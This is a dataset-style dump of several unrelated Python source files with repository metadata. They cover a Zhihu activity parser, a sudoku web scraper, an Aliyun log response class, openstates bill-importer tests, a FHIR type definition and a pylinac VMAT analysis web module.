return Question(Zhihu_URL + act.div.a['href'], act.div.a.text, session=self._session)
def _assemble_follow_collection(self, act):
url = act.div.a['href']
if not url.startswith('http'):
url = Zhihu_URL + url
return Collection(url, session=self._session)
def _get_assemble_method(self, act_type):
assemble_methods = {
ActType.UPVOTE_POST: self._assemble_voteup_post,
ActType.FOLLOW_COLUMN: self._assemble_follow_column,
ActType.UPVOTE_ANSWER: self._assemble_voteup_answer,
ActType.ANSWER_QUESTION: self._assemble_answer_question,
ActType.ASK_QUESTION: self._assemble_ask_question,
ActType.FOLLOW_QUESTION: self._assemble_follow_question,
ActType.FOLLOW_TOPIC: self._assemble_follow_topic,
ActType.PUBLISH_POST: self._assemble_create_post,
ActType.FOLLOW_COLLECTION: self._assemble_follow_collection
}
if act_type in assemble_methods:
return assemble_methods[act_type]
else:
raise ValueError('invalid activity type')
@staticmethod
def _parse_un_cn(act):
upvote_num = act.find('a', class_='zm-item-vote-count').text
if upvote_num.isdigit():
upvote_num = int(upvote_num)
else:
upvote_num = None
comment = act.find('a', class_='toggle-comment')
comment_text = next(comment.stripped_strings)
comment_num_match = re_get_number.match(comment_text)
comment_num = int(comment_num_match.group(1)) if comment_num_match is not None else 0
return comment_num, upvote_num
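# --- Editor's hedged usage sketch (not part of the original module) ---
# The `_assemble_*` helpers above are meant to be looked up by activity type and
# applied to the matching soup tag; names `acts` and `type_of` below are
# hypothetical placeholders for the caller's own parsing loop:
#
#   for act in acts:
#       act_type = type_of(act)                      # e.g. ActType.UPVOTE_ANSWER
#       build = self._get_assemble_method(act_type)  # -> _assemble_voteup_answer
#       obj = build(act)                             # Answer / Post / Question / ...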
| 37.804233 | 101 | 0.630931 |
5dd08ae61bb79be9a062edf8089b922ef67c3224 | 2,058 | py | Python | sudoku_scraper_bs.py | isaacwen/sudoku | 10a625033aa115f07c4a638736b357539bb2bf86 | ["MIT"] | null | null | null | sudoku_scraper_bs.py | isaacwen/sudoku | 10a625033aa115f07c4a638736b357539bb2bf86 | ["MIT"] | null | null | null | sudoku_scraper_bs.py | isaacwen/sudoku | 10a625033aa115f07c4a638736b357539bb2bf86 | ["MIT"] | null | null | null |
# Isaac Wen
# This program gets sudoku puzzles from nine.websudoku.com and stores them
# locally
import urllib.request
from sudoku_backtracking import *
from bs4 import BeautifulSoup
# Produces the HTML for a specified difficulty of sudoku puzzle
def get_html(num):
url = "https://nine.websudoku.com/?level=" + str(num)
data = urllib.request.urlopen(url)
data = data.read()
return str(data)
# Produces the 81 digits representing the solution to a sudoku puzzle and
# the mask from the HTML produces by get_html
def get_sol(str):
soup = BeautifulSoup(str, 'html.parser')
puzzle_html = soup.select("#cheat")
puzzle = puzzle_html[0]['value']
mask_html = soup.select("#editmask")
mask = mask_html[0]['value']
return (puzzle, mask)
# Masks a given sudoku puzzle using a given mask
def mask_sol(sol_mask):
(sol, mask) = sol_mask
actual_puz = ""
for i in range(81):
if mask[i] == "1":
actual_puz = actual_puz + "0"
else:
actual_puz = actual_puz + sol[i]
return actual_puz
# Generates a puzzle and its solution given a difficulty from 1 - 4
def get_puzzle(num):
html = get_html(num)
sol_mask = get_sol(html)
(sol, mask) = sol_mask
puzzle = mask_sol(sol_mask)
return (puzzle, sol)
# Generates puzzles based on the user's difficulty specification
def generate_main():
difficulty = str(input("What difficulty puzzle would you like?\n(Enter"
" a difficulty from 1 to 4, 1 being the "
"easiest): "))
(puz, sol) = get_puzzle(difficulty)
puzzle = SudokuAI(puz)
solution = SudokuAI(sol)
print("The following is a puzzle of difficulty {0}:".format(difficulty))
print(puzzle)
    input("Press ENTER to view the solution.")  # just pause; avoid shadowing the built-in next()
print(solution)
choice = input("Would you like to view another puzzle? (Y to view): ")
if choice == "Y":
generate_main()
else:
return
# generate_main()
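# --- Editor's hedged usage sketch (not part of the original script) ---
# The pieces above compose like this (network access required; SudokuAI comes
# from the sudoku_backtracking star-import):
#
#   puzzle, solution = get_puzzle(2)   # difficulty 1-4, see get_html()
#   print(SudokuAI(puzzle))            # masked puzzle, zeros for hidden cells
#   print(SudokuAI(solution))          # full 81-digit solution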
| 32.666667 | 77 | 0.635083 |
dba1c0e68d0b8d01198764d41703ab41afda5b2b | 833 | py | Python | aliyun/log/cursor_time_response.py | TylerTemp/aliyun-log-sdk-python | c2935027df8efc0088e3369c00839fc80f615ef2 | ["BSD-3-Clause"] | null | null | null | aliyun/log/cursor_time_response.py | TylerTemp/aliyun-log-sdk-python | c2935027df8efc0088e3369c00839fc80f615ef2 | ["BSD-3-Clause"] | null | null | null | aliyun/log/cursor_time_response.py | TylerTemp/aliyun-log-sdk-python | c2935027df8efc0088e3369c00839fc80f615ef2 | ["BSD-3-Clause"] | null | null | null |
#!/usr/bin/env python
#encoding: utf-8
# Copyright (C) Alibaba Cloud Computing
# All rights reserved.
from aliyun.log.util import Util
from logresponse import LogResponse
class GetCursorTimeResponse(LogResponse):
""" The response of the get_cursor_time API from log.
:type header: dict
:param header: GetCursorTimeResponse HTTP response header
:type resp: dict
:param resp: the HTTP response body
"""
def __init__(self, resp, header):
LogResponse.__init__(self, header)
self.cursor_time = resp['cursor_time']
    def get_cursor_time(self):
return self.cursor_time
def log_print(self):
print 'GetCursorTimeResponse'
print 'headers:', self.get_all_headers()
print 'cursor_time:', self.cursor_time
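# --- Editor's hedged usage sketch (not part of the original module) ---
# The wrapper is typically built by the client from a parsed JSON body plus the
# HTTP headers, roughly:
#
#   resp = GetCursorTimeResponse({'cursor_time': 1400000000}, header)
#   resp.get_cursor_time()   # -> 1400000000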
| 25.242424 | 62 | 0.656663 |
c015a79711de28bda18df5b58fd732efa7552d38 | 18,087 | py | Python | openstates/importers/tests/test_bill_importer.py | washabstract/openstates-core | ea69564f1f56fe4a80181b0aa715731bbc47e3f5 | ["MIT"] | 9 | 2020-04-04T00:19:07.000Z | 2022-02-27T02:24:12.000Z | openstates/importers/tests/test_bill_importer.py | washabstract/openstates-core | ea69564f1f56fe4a80181b0aa715731bbc47e3f5 | ["MIT"] | 17 | 2020-03-31T18:19:59.000Z | 2022-01-03T15:18:48.000Z | openstates/importers/tests/test_bill_importer.py | washabstract/openstates-core | ea69564f1f56fe4a80181b0aa715731bbc47e3f5 | ["MIT"] | 19 | 2020-04-10T21:32:21.000Z | 2022-03-02T20:23:21.000Z |
import pytest
from openstates.scrape import Bill as ScrapeBill
from openstates.importers import BillImporter
from openstates.data.models import (
Jurisdiction,
Person,
Organization,
Membership,
Division,
Bill,
)
from openstates.utils.transformers import fix_bill_id
from openstates.utils.generic import _make_pseudo_id
from openstates.exceptions import DuplicateItemError
def create_jurisdiction() -> Jurisdiction:
Division.objects.create(id="ocd-division/country:us", name="USA")
j = Jurisdiction.objects.create(id="jid", division_id="ocd-division/country:us")
j.legislative_sessions.create(
identifier="1899", name="1899", start_date="1899", end_date="1900"
)
j.legislative_sessions.create(
identifier="1900", name="1900", start_date="1900", end_date="1901"
)
return j
def create_org():
return Organization.objects.create(
id="org-id", name="House", classification="lower", jurisdiction_id="jid"
)
@pytest.mark.django_db
def test_full_bill():
create_jurisdiction()
person = Person.objects.create(name="Adam Smith")
lower = Organization.objects.create(
jurisdiction_id="jid", name="House", classification="lower"
)
Membership.objects.create(person_id=person.id, organization_id=lower.id)
Organization.objects.create(
jurisdiction_id="jid",
name="Arbitrary Committee",
classification="committee",
parent=lower,
)
oldbill = ScrapeBill(
"HB 99",
"1899",
"Axe & Tack Tax Act",
classification="tax bill",
chamber="lower",
)
bill = ScrapeBill(
"HB 1", "1900", "Axe & Tack Tax Act", classification="tax bill", chamber="lower"
)
bill.subject = ["taxes", "axes"]
bill.add_identifier("SB 9")
bill.add_title("Tack & Axe Tax Act")
bill.add_action("introduced in house", "1900-04-01", chamber="lower")
act = bill.add_action("sent to arbitrary committee", "1900-04-04", chamber="lower")
act.add_related_entity(
"arbitrary committee",
"organization",
_make_pseudo_id(name="Arbitrary Committee"),
)
bill.add_related_bill(
"HB 99", legislative_session="1899", relation_type="prior-session"
)
bill.add_sponsorship(
"Adam Smith",
classification="extra sponsor",
entity_type="person",
primary=False,
entity_id=_make_pseudo_id(name="Adam Smith"),
)
bill.add_sponsorship(
"Jane Smith", classification="lead sponsor", entity_type="person", primary=True
)
bill.add_abstract(
"This is an act about axes and taxes and tacks.",
note="official",
)
bill.add_document_link(
"Fiscal Note", "http://example.com/fn.pdf", media_type="application/pdf"
)
bill.add_document_link(
"Fiscal Note", "http://example.com/fn.html", media_type="text/html"
)
bill.add_version_link(
"Fiscal Note", "http://example.com/v/1", media_type="text/html"
)
bill.add_source("http://example.com/source")
# import bill
BillImporter("jid").import_data([oldbill.as_dict(), bill.as_dict()])
# get bill from db and assert it imported correctly
b = Bill.objects.get(identifier="HB 1")
assert b.from_organization.classification == "lower"
assert b.identifier == bill.identifier
assert b.title == bill.title
assert b.classification == bill.classification
assert b.subject == ["taxes", "axes"]
assert b.abstracts.get().note == "official"
# other_title, other_identifier added
assert b.other_titles.get().title == "Tack & Axe Tax Act"
assert b.other_identifiers.get().identifier == "SB 9"
# actions
actions = list(b.actions.all())
assert len(actions) == 2
# ensure order was preserved (if this breaks it'll be intermittent)
assert actions[0].organization == Organization.objects.get(classification="lower")
assert actions[0].description == "introduced in house"
assert actions[1].description == "sent to arbitrary committee"
assert actions[1].related_entities.get().organization == Organization.objects.get(
classification="committee"
)
# action computed fields
assert b.first_action_date == "1900-04-01"
assert b.latest_action_date == "1900-04-04"
assert b.latest_action_description == "sent to arbitrary committee"
# related_bills were added
rb = b.related_bills.get()
assert rb.identifier == "HB 99"
# and bill got resolved
assert rb.related_bill.identifier == "HB 99"
# sponsors added, linked & unlinked
sponsorships = b.sponsorships.all()
assert len(sponsorships) == 2
person = Person.objects.get(name="Adam Smith")
for ss in sponsorships:
if ss.primary:
assert ss.person is None
assert ss.organization is None
else:
assert ss.person == person
# versions & documents with their links
versions = b.versions.all()
assert len(versions) == 1
assert versions[0].links.count() == 1
documents = b.documents.all()
assert len(documents) == 1
assert documents[0].links.count() == 2
# sources
assert b.sources.count() == 1
@pytest.mark.django_db
def test_bill_chamber_param():
create_jurisdiction()
org = create_org()
bill = ScrapeBill(
"HB 1", "1900", "Axe & Tack Tax Act", classification="tax bill", chamber="lower"
)
BillImporter("jid").import_data([bill.as_dict()])
assert Bill.objects.get().from_organization_id == org.id
@pytest.mark.django_db
def test_duplicate_bill_different_chamber():
create_jurisdiction()
create_org()
Organization.objects.create(
id="upper-id", name="Senate", classification="upper", jurisdiction_id="jid"
)
b1 = ScrapeBill("HB 1", "1900", "Axe & Tack Tax Act", chamber="lower")
b2 = ScrapeBill("HB 1", "1900", "Axe & Tack Tax Act", chamber="upper")
with pytest.raises(DuplicateItemError):
BillImporter("jid").import_data([b1.as_dict(), b2.as_dict()])
@pytest.mark.django_db
def test_bill_update():
create_jurisdiction()
create_org()
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
_, what = BillImporter("jid").import_item(bill.as_dict())
assert what == "insert"
_, what = BillImporter("jid").import_item(bill.as_dict())
assert what == "noop"
# ensure no new object was created
assert Bill.objects.count() == 1
# test basic update
bill = ScrapeBill("HB 1", "1900", "1st Bill", chamber="lower")
_, what = BillImporter("jid").import_item(bill.as_dict())
assert what == "update"
assert Bill.objects.get().title == "1st Bill"
@pytest.mark.django_db
def test_bill_update_because_of_subitem():
create_jurisdiction()
create_org()
# initial bill
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_action("this is an action", chamber="lower", date="1900-01-01")
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["insert"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 1
last_updated = obj.updated_at
# now let's make sure we get updated when there are second actions
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_action("this is an action", chamber="lower", date="1900-01-01")
bill.add_action("this is a second action", chamber="lower", date="1900-01-02")
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 2
assert obj.updated_at > last_updated
# same 2 actions, noop
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_action("this is an action", chamber="lower", date="1900-01-01")
bill.add_action("this is a second action", chamber="lower", date="1900-01-02")
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["noop"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 2
# same 2 actions, different order, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_action("this is a second action", chamber="lower", date="1900-01-02")
bill.add_action("this is an action", chamber="lower", date="1900-01-01")
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 2
# different 2 actions, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_action("this is an action", chamber="lower", date="1900-01-01")
bill.add_action(
"this is a different second action", chamber="lower", date="1900-01-02"
)
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 2
# delete an action, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_action("this is a second action", chamber="lower", date="1900-01-02")
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 1
# delete all actions, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 0
# and back to initial status, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_action("this is an action", chamber="lower", date="1900-01-01")
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 1
@pytest.mark.django_db
def test_bill_update_subsubitem():
create_jurisdiction()
create_org()
# initial sub-subitem
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_version_link(
"printing", "http://example.com/test.pdf", media_type="application/pdf"
)
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["insert"] == 1
obj = Bill.objects.get()
assert obj.versions.count() == 1
assert obj.versions.get().links.count() == 1
# a second subsubitem, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_version_link(
"printing", "http://example.com/test.pdf", media_type="application/pdf"
)
bill.add_version_link(
"printing", "http://example.com/test.text", media_type="text/plain"
)
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.versions.count() == 1
assert obj.versions.get().links.count() == 2
# same thing, noop
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_version_link(
"printing", "http://example.com/test.pdf", media_type="application/pdf"
)
bill.add_version_link(
"printing", "http://example.com/test.text", media_type="text/plain"
)
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["noop"] == 1
obj = Bill.objects.get()
assert obj.versions.count() == 1
assert obj.versions.get().links.count() == 2
# different link for second one, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_version_link(
"printing", "http://example.com/test.pdf", media_type="application/pdf"
)
bill.add_version_link(
"printing", "http://example.com/diff-link.txt", media_type="text/plain"
)
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.versions.count() == 1
assert obj.versions.get().links.count() == 2
# delete one, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_version_link(
"printing", "http://example.com/test.pdf", media_type="application/pdf"
)
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.versions.count() == 1
assert obj.versions.get().links.count() == 1
@pytest.mark.django_db
def test_bill_sponsor_by_identifier():
create_jurisdiction()
org = create_org()
bill = ScrapeBill(
"HB 1", "1900", "Axe & Tack Tax Act", classification="tax bill", chamber="lower"
)
bill.add_sponsorship_by_identifier(
name="SNODGRASS",
classification="sponsor",
entity_type="person",
primary=True,
identifier="TOTALLY_REAL_ID",
scheme="TOTALLY_REAL_SCHEME",
)
za_db = Person.objects.create(name="Zadock Snodgrass")
za_db.identifiers.create(identifier="TOTALLY_REAL_ID", scheme="TOTALLY_REAL_SCHEME")
Membership.objects.create(person_id=za_db.id, organization_id=org.id)
BillImporter("jid").import_data([bill.as_dict()])
obj = Bill.objects.get()
(entry,) = obj.sponsorships.all()
assert entry.person.name == "Zadock Snodgrass"
@pytest.mark.django_db
def test_bill_sponsor_limit_lookup_by_jurisdiction():
create_jurisdiction()
org = create_org()
bill = ScrapeBill(
"HB 1", "1900", "Axe & Tack Tax Act", classification="tax bill", chamber="lower"
)
bill.add_sponsorship_by_identifier(
name="SNODGRASS",
classification="sponsor",
entity_type="person",
primary=True,
identifier="TOTALLY_REAL_ID",
scheme="TOTALLY_REAL_SCHEME",
)
za_db = Person.objects.create(name="Zadock Snodgrass", birth_date="1800-01-01")
za_db.identifiers.create(identifier="TOTALLY_REAL_ID", scheme="TOTALLY_REAL_SCHEME")
Membership.objects.create(person_id=za_db.id, organization_id=org.id)
# This is contrived and perhaps broken, but we're going to check this.
# We *really* don't want to *ever* cross jurisdiction bounds.
za2 = Person.objects.create(name="Zadock Snodgrass")
za2.identifiers.create(identifier="TOTALLY_REAL_ID", scheme="TOTALLY_REAL_SCHEME")
assert Person.objects.count() == 2
BillImporter("jid").import_data([bill.as_dict()])
obj = Bill.objects.get()
(entry,) = obj.sponsorships.all()
assert entry.person.name == "Zadock Snodgrass"
assert entry.person.birth_date == "1800-01-01"
@pytest.mark.django_db
def test_bill_sponsor_limit_lookup_within_session():
j = create_jurisdiction()
org = create_org()
j.legislative_sessions.create(
identifier="2021", name="2021", start_date="2021", end_date="2022"
)
old_bill = ScrapeBill(
"HB 1", "1900", "Axe & Tack Tax Act", classification="tax bill", chamber="lower"
)
old_bill.add_sponsorship(
name="Springfield",
classification="sponsor",
entity_type="person",
primary=True,
)
new_bill = ScrapeBill(
"HB 9000",
"2021",
"Laser Regulations",
classification="tax bill",
chamber="lower",
)
new_bill.add_sponsorship(
name="Springfield",
classification="sponsor",
entity_type="person",
primary=True,
)
jeb = Person.objects.create(
name="Jebediah Springfield", birth_date="1850-01-01", family_name="Springfield"
)
Membership.objects.create(
person_id=jeb.id, organization_id=org.id, end_date="1910-01-01"
)
futuro = Person.objects.create(
name="Futuro Springfield", birth_date="2000-01-01", family_name="Springfield"
)
Membership.objects.create(
person_id=futuro.id, organization_id=org.id, start_date="2020-04-01"
)
BillImporter("jid").import_data([old_bill.as_dict(), new_bill.as_dict()])
# get old bill and ensure Jeb is sponsor
old_bill_obj = Bill.objects.get(identifier="HB 1")
(entry,) = old_bill_obj.sponsorships.all()
assert entry.person.name == jeb.name
# get new bill and ensure Futuro is sponsor
new_bill_obj = Bill.objects.get(identifier="HB 9000")
(entry,) = new_bill_obj.sponsorships.all()
assert entry.person.name == futuro.name
@pytest.mark.django_db
def test_fix_bill_id():
create_jurisdiction()
create_org()
bill = ScrapeBill(
"hb1", "1900", "Test Bill ID", classification="bill", chamber="lower"
)
from openstates.settings import IMPORT_TRANSFORMERS
IMPORT_TRANSFORMERS["bill"] = {
"identifier": fix_bill_id,
}
bi = BillImporter("jid")
bi.import_data([bill.as_dict()])
IMPORT_TRANSFORMERS["bill"] = {}
b = Bill.objects.get()
assert b.identifier == "HB 1"
@pytest.mark.django_db
def test_bill_duplicate_actions_ordering():
create_jurisdiction()
create_org()
def _problem_bill():
bill = ScrapeBill(
"HB 1",
"1900",
"Axe & Tack Tax Act",
classification="tax bill",
chamber="lower",
)
# two identical actions, and one differs
bill.add_action("identical action", "1900-04-01", chamber="lower")
bill.add_action("different action", "1900-04-01", chamber="lower")
bill.add_action("identical action", "1900-04-01", chamber="lower")
return bill
# import bill
bill = _problem_bill()
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["insert"] == 1
assert result["bill"]["update"] == 0
assert result["bill"]["noop"] == 0
bill = _problem_bill()
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["insert"] == 0
assert result["bill"]["update"] == 0
assert result["bill"]["noop"] == 1
| 33.934334 | 88 | 0.650965 |
6359c038d599fb2cc221c2649199aa5f53947c9f | 3,970 | py | Python | src/fhir_types/FHIR_SubstanceSpecification_Relationship.py | anthem-ai/fhir-types | 42348655fb3a9b3f131b911d6bc0782da8c14ce4 | ["Apache-2.0"] | 2 | 2022-02-03T00:51:30.000Z | 2022-02-03T18:42:43.000Z | src/fhir_types/FHIR_SubstanceSpecification_Relationship.py | anthem-ai/fhir-types | 42348655fb3a9b3f131b911d6bc0782da8c14ce4 | ["Apache-2.0"] | null | null | null | src/fhir_types/FHIR_SubstanceSpecification_Relationship.py | anthem-ai/fhir-types | 42348655fb3a9b3f131b911d6bc0782da8c14ce4 | ["Apache-2.0"] | null | null | null |
from typing import Any, List, Literal, TypedDict
from .FHIR_boolean import FHIR_boolean
from .FHIR_CodeableConcept import FHIR_CodeableConcept
from .FHIR_Element import FHIR_Element
from .FHIR_Quantity import FHIR_Quantity
from .FHIR_Range import FHIR_Range
from .FHIR_Ratio import FHIR_Ratio
from .FHIR_Reference import FHIR_Reference
from .FHIR_string import FHIR_string
# The detailed description of a substance, typically at a level beyond what is used for prescribing.
FHIR_SubstanceSpecification_Relationship = TypedDict(
"FHIR_SubstanceSpecification_Relationship",
{
# Unique id for the element within a resource (for internal references). This may be any string value that does not contain spaces.
"id": FHIR_string,
# May be used to represent additional information that is not part of the basic definition of the element. To make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer can define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension.
"extension": List[Any],
# May be used to represent additional information that is not part of the basic definition of the element and that modifies the understanding of the element in which it is contained and/or the understanding of the containing element's descendants. Usually modifier elements provide negation or qualification. To make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer can define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension. Applications processing a resource are required to check for modifier extensions.Modifier extensions SHALL NOT change the meaning of any elements on Resource or DomainResource (including cannot change the meaning of modifierExtension itself).
"modifierExtension": List[Any],
# A pointer to another substance, as a resource or just a representational code.
"substanceReference": FHIR_Reference,
# A pointer to another substance, as a resource or just a representational code.
"substanceCodeableConcept": FHIR_CodeableConcept,
# For example "salt to parent", "active moiety", "starting material".
"relationship": FHIR_CodeableConcept,
# For example where an enzyme strongly bonds with a particular substance, this is a defining relationship for that enzyme, out of several possible substance relationships.
"isDefining": FHIR_boolean,
# Extensions for isDefining
"_isDefining": FHIR_Element,
# A numeric factor for the relationship, for instance to express that the salt of a substance has some percentage of the active substance in relation to some other.
"amountQuantity": FHIR_Quantity,
# A numeric factor for the relationship, for instance to express that the salt of a substance has some percentage of the active substance in relation to some other.
"amountRange": FHIR_Range,
# A numeric factor for the relationship, for instance to express that the salt of a substance has some percentage of the active substance in relation to some other.
"amountRatio": FHIR_Ratio,
# A numeric factor for the relationship, for instance to express that the salt of a substance has some percentage of the active substance in relation to some other.
"amountString": str,
# Extensions for amountString
"_amountString": FHIR_Element,
# For use when the numeric.
"amountRatioLowLimit": FHIR_Ratio,
# An operator for the amount, for example "average", "approximately", "less than".
"amountType": FHIR_CodeableConcept,
# Supporting literature.
"source": List[FHIR_Reference],
},
total=False,
)
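# --- Editor's hedged usage sketch (not part of the generated module) ---
# Because the TypedDict is declared with total=False, any subset of the keys
# above is an acceptable value; the field contents below are illustrative only:
#
#   relationship: FHIR_SubstanceSpecification_Relationship = {
#       "relationship": {"text": "salt to parent"},
#       "isDefining": True,
#       "amountString": "20 %",
#   }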
| 77.843137 | 836 | 0.756423 |
8f4b210dbe60358a33aeab0b4611f3235d4c7c37 | 7,644 | py | Python | pyqaserver/vmat_module.py | brjdenis/qaserver | 93a4c3272cf38199e7ef67d1285a9ffacef46883 | ["MIT"] | 11 | 2019-12-02T04:27:48.000Z | 2020-06-10T09:18:11.000Z | pyqaserver/vmat_module.py | brjdenis/pyqaserver | 93a4c3272cf38199e7ef67d1285a9ffacef46883 | ["MIT"] | 13 | 2020-10-19T16:38:56.000Z | 2021-05-04T19:44:01.000Z | pyqaserver/vmat_module.py | brjdenis/qaserver | 93a4c3272cf38199e7ef67d1285a9ffacef46883 | ["MIT"] | 2 | 2020-01-13T17:00:41.000Z | 2020-01-28T21:32:58.000Z |
import sys
import os
import numpy as np
from multiprocessing import Pool
import tempfile
import matplotlib.style
import matplotlib
matplotlib.use('Agg')
from matplotlib.figure import Figure
# To revert back to matplotlib 1.0 style
matplotlib.style.use('classic')
from pylinac import DRGS, DRMLC
parent_module = sys.modules['.'.join(__name__.split('.')[:-1]) or '__main__']
if __name__ == '__main__' or parent_module.__name__ == '__main__':
#sys.path.append(os.path.abspath(os.path.realpath("python_packages")))
import config
from python_packages.bottlepy.bottle import Bottle, request, TEMPLATE_PATH, template, redirect, response
import general_functions
import RestToolbox_modified as RestToolbox
from python_packages import mpld3
else:
from . import config
from .python_packages.bottlepy.bottle import Bottle, request, TEMPLATE_PATH, template, redirect, response
from . import general_functions
from . import RestToolbox_modified as RestToolbox
from .python_packages import mpld3
CUR_DIR = os.path.realpath(os.path.dirname(__file__))
# Path to Bottle templates
TEMPLATE_PATH.insert(0, os.path.join(CUR_DIR, 'views'))
# Url to some mpld3 library
D3_URL = config.D3_URL
MPLD3_URL = config.MPLD3_URL
PI = np.pi
# MLC type for PicketFence analysis:
LEAF_TYPE = ["Varian_120", "Varian_120HD", "Varian_80", "Elekta_80", "Elekta_160"]
# Here starts the bottle server
vmat_app = Bottle()
@vmat_app.route('/vvmat', method="POST")
def vvmat():
displayname = request.forms.hidden_displayname
username = request.get_cookie("account", secret=config.SECRET_KEY)
if not username:
redirect("/login")
try:
variables = general_functions.Read_from_dcm_database()
variables["displayname"] = displayname
response.set_cookie("account", username, secret=config.SECRET_KEY, samesite="lax")
except ConnectionError:
return template("error_template", {"error_message": "Orthanc is refusing connection."})
return template("vvmat", variables)
def vmat_helperf_catch_error(args):
try:
return vmat_helperf(args)
except Exception as e:
return template("error_template", {"error_message": str(e)})
def vmat_helperf(args):
testtype = args["testtype"]
w1 = args["w1"]
w2 = args["w2"]
imgdescription = args["imgdescription"]
station = args["station"]
displayname = args["displayname"]
acquisition_datetime = args["acquisition_datetime"]
general_functions.set_configuration(args["config"])
# Collect data for "save results"
dicomenergy = general_functions.get_energy_from_imgdescription(imgdescription)
user_machine, user_energy = general_functions.get_user_machine_and_energy(station, dicomenergy)
machines_and_energies = general_functions.get_machines_and_energies(general_functions.get_treatmentunits_vmat())
tolerances = general_functions.get_tolerance_user_machine_vmat(user_machine) # If user_machne has specific tolerance
if not tolerances:
tolerance, pdf_report_enable = general_functions.get_settings_vmat()
else:
tolerance, pdf_report_enable = tolerances[0]
tolerance = float(tolerance)
save_results = {
"user_machine": user_machine,
"user_energy": user_energy,
"machines_and_energies": machines_and_energies,
"testtype": [testtype],
"displayname": displayname
}
if w1==w2:
return template("error_template", {"error_message": "Selected images must not be equal. One image should be an open field,"\
" the other DRGS or DRMLC."})
try:
temp_folder1, file_path1 = RestToolbox.GetSingleDcm(config.ORTHANC_URL, w1)
temp_folder2, file_path2 = RestToolbox.GetSingleDcm(config.ORTHANC_URL, w2)
except:
return template("error_template", {"error_message": "Cannot read images."})
try:
if testtype == "DRGS":
myvmat = DRGS(image_paths=(file_path1, file_path2))
else:
myvmat = DRMLC(image_paths=(file_path1, file_path2))
myvmat.analyze(tolerance=tolerance)
except Exception as e:
return template("error_template", {"error_message": "Cannot analyze images. "+str(e)})
fig1 = Figure(figsize=(10.5, 5), tight_layout={"w_pad":3, "pad": 3})
ax1 = fig1.add_subplot(1,2,1)
ax2 = fig1.add_subplot(1,2,2)
ax1.imshow(myvmat.open_image.array, cmap=matplotlib.cm.gray, interpolation="none", aspect="equal", origin='upper')
ax1.set_title('Open')
ax1.axis('off')
myvmat._draw_segments(ax1)
ax2.imshow(myvmat.dmlc_image, cmap=matplotlib.cm.gray, interpolation="none", aspect="equal", origin='upper')
ax2.set_title('DMLC')
ax2.axis('off')
myvmat._draw_segments(ax2)
mpld3.plugins.connect(fig1, mpld3.plugins.MousePosition(fontsize=14, fmt=".2f"))
script1 = mpld3.fig_to_html(fig1, d3_url=D3_URL, mpld3_url=MPLD3_URL)
fig2 = Figure(figsize=(10.5, 5), tight_layout={"w_pad":1, "pad": 1})
ax3 = fig2.add_subplot(1,1,1)
dmlc_prof, open_prof = myvmat._median_profiles((myvmat.dmlc_image, myvmat.open_image))
# Taken from pylinac:
ax3.plot(dmlc_prof.values, label='DMLC')
ax3.plot(open_prof.values, label='Open')
ax3.autoscale(axis='x', tight=True)
ax3.legend(loc=8, fontsize='large')
ax3.grid()
ax3.set_title("Median profiles")
ax3.margins(0.05)
mpld3.plugins.connect(fig2, mpld3.plugins.MousePosition(fontsize=14, fmt=".2f"))
script2 = mpld3.fig_to_html(fig2, d3_url=D3_URL, mpld3_url=MPLD3_URL)
# Collect data
Rcorr = [roi.r_corr for roi in myvmat.segments]
diff_corr = myvmat.r_devs
diff_avg_abs = round(myvmat.avg_abs_r_deviation, 2)
max_diff_abs = round(myvmat.max_r_deviation, 2)
segment_passed = [roi.passed for roi in myvmat.segments]
test_passed = myvmat.passed
variables = {
"script1": script1,
"script2": script2,
"Rcorr": Rcorr,
"diff_corr": diff_corr,
"diff_avg_abs": diff_avg_abs,
"max_diff_abs": max_diff_abs,
"segment_passed": segment_passed,
"test_passed": test_passed,
"save_results": save_results,
"pdf_report_enable": pdf_report_enable,
